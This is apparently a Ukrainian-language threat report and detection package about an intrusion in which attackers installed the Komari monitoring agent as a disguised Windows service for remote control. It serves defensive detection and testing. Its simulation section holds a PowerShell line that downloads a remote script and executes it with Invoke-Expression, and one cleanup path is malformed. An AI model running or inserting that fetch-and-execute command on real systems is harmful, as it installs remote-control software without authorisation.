Komari: Інструмент «Моніторингу», Який Не Потребував Оружі
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисник використав вкрадені облікові дані VPN, щоб отримати доступ до робочої станції Windows партнера Huntress, потім увімкнув RDP і розгорнув агент моніторингу з відкритим кодом Komari як сервіс рівня SYSTEM, замаскований під службу оновлення Windows за допомогою NSSM. Після установки агент встановив стале з’єднання WebSocket із інфраструктурою, контрольованою зловмисником, і надав функції, такі як виконання команд, доступ до терміналу та відстежуючі пінги. На практиці інструмент функціонував як легковажна платформа управління і контролю без потреби в додатковій зброї.
Розслідування
Проникнення почалося з входу в SSL VPN, що походив з 45.153.34.132, а потім з використанням Impacket’s smbexec.py для ввімкнення RDP і виконання низки віддалених команд. Розслідувачі виявили, що одноразова команда PowerShell завантажила інсталятор Komari безпосередньо з GitHub і зареєструвала його як службу Windows. Ця служба потім запустила komari-agent.exe, відкрило сесію WebSocket до сервера зловмисника і дало змогу виконувати довільні віддалені команди на хості.
Усунення
Huntress відреагував, ізолювавши скомпрометовану робочу станцію, відключивши обліковий запис користувача та зупинивши службу Komari, створену NSSM. Шкідливе з’єднання WebSocket було заблоковано, а механізм збереження вилучено із системи. Рекомендовані подальші заходи включають посилення контролю доступу VPN, моніторинг підозрілих подій створення служб, перевірку вихідної активності WebSocket і посилення безпеки RDP.
Реакція
Захисники повинні виявляти створення служби Windows з назвою Windows Update Service, яка вказує на komari-agent.exe, моніторити довгострокові вихідні з’єднання WebSocket із незнайомими хостами та повідомляти про використання інструментів Impacket, таких як smbexec.py для латерального руху. Якщо виявлено, необхідно негайно вмістити уражений кінцевий пункт, відкликати скомпрометовані облікові дані та видалити помилкову службу з середовища.
Потік атаки
Виявлення
Можливі зразки командного рядка Impacket (через cmdline)
Перегляд
Можливе дистанційне виконання коду за допомогою Impacket (через cmdline)
Перегляд
Виконання файлу PowerShell у підозрілому каталозі з використанням політики обходу (через cmdline)
Перегляд
Завантаження або вивантаження через PowerShell (через cmdline)
Перегляд
Можливе затінення служб віддаленого робочого столу (через процес створення)
Перегляд
Підозрілі зміни брандмауера через CLI (через cmdline)
Перегляд
Підозрілий процес використовує URL у командному рядку (через cmdline)
Перегляд
Альтернативне віддалене управління/програмне забезпечення управління (через процес створення)
Перегляд
IOCs (HashSha256) для виявлення: Komari: “Інструмент моніторингу”, що не потребував зброї
Перегляд
IOCs (SourceIP) для виявлення: Komari: “Інструмент моніторингу”, що не потребував зброї
Перегляд
IOCs (DestinationIP) для виявлення: Komari: “Інструмент моніторингу”, що не потребував зброї
Перегляд
Виявлення виконання Impacket smbexec.py і cmd.exe через RDP [створення процесів Windows]
Перегляд
Виконання PowerShell для встановлення агента Komari [Windows PowerShell]
Перегляд
Виявлення стабільності агента Komari через службу Windows Update [Система Windows]
Перегляд
Виявлення неавторизованого доступу SSLVPN та активності після компрометації [Брандмауер]
Перегляд
Виконання моделювання
Передумова: перевірка телеметрії та базових показників повинна бути успішно пройдена.
-
Опис атаки та команди:
Противник отримав початкову точку доступу на Windows хості та хоче встановити агент Komari C2 для підтримки стабільності й пізніше витягти облікові дані (T1003.001). Щоб уникнути спрацьовування традиційних засобів блокування скриптів, він запускає PowerShell з-ExecutionPolicy Bypassі безпосередньо завантажує інсталятор з публічного репозиторію GitHub. Командний рядок точно відповідає правилу виявлення, генеруючи очікувану телеметрію. -
Тестовий скрипт регресії:
# Імітація встановлення агента Komari $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1" $script = (New-Object System.Net.WebClient).DownloadString($url) Invoke-Expression $script -
Команди очищення:
# Видалення будь-яких файлів, створених симульованим інсталятором (якщо такі є) Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue # Зупинення будь-якого процесу Komari, який міг бути запущений Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force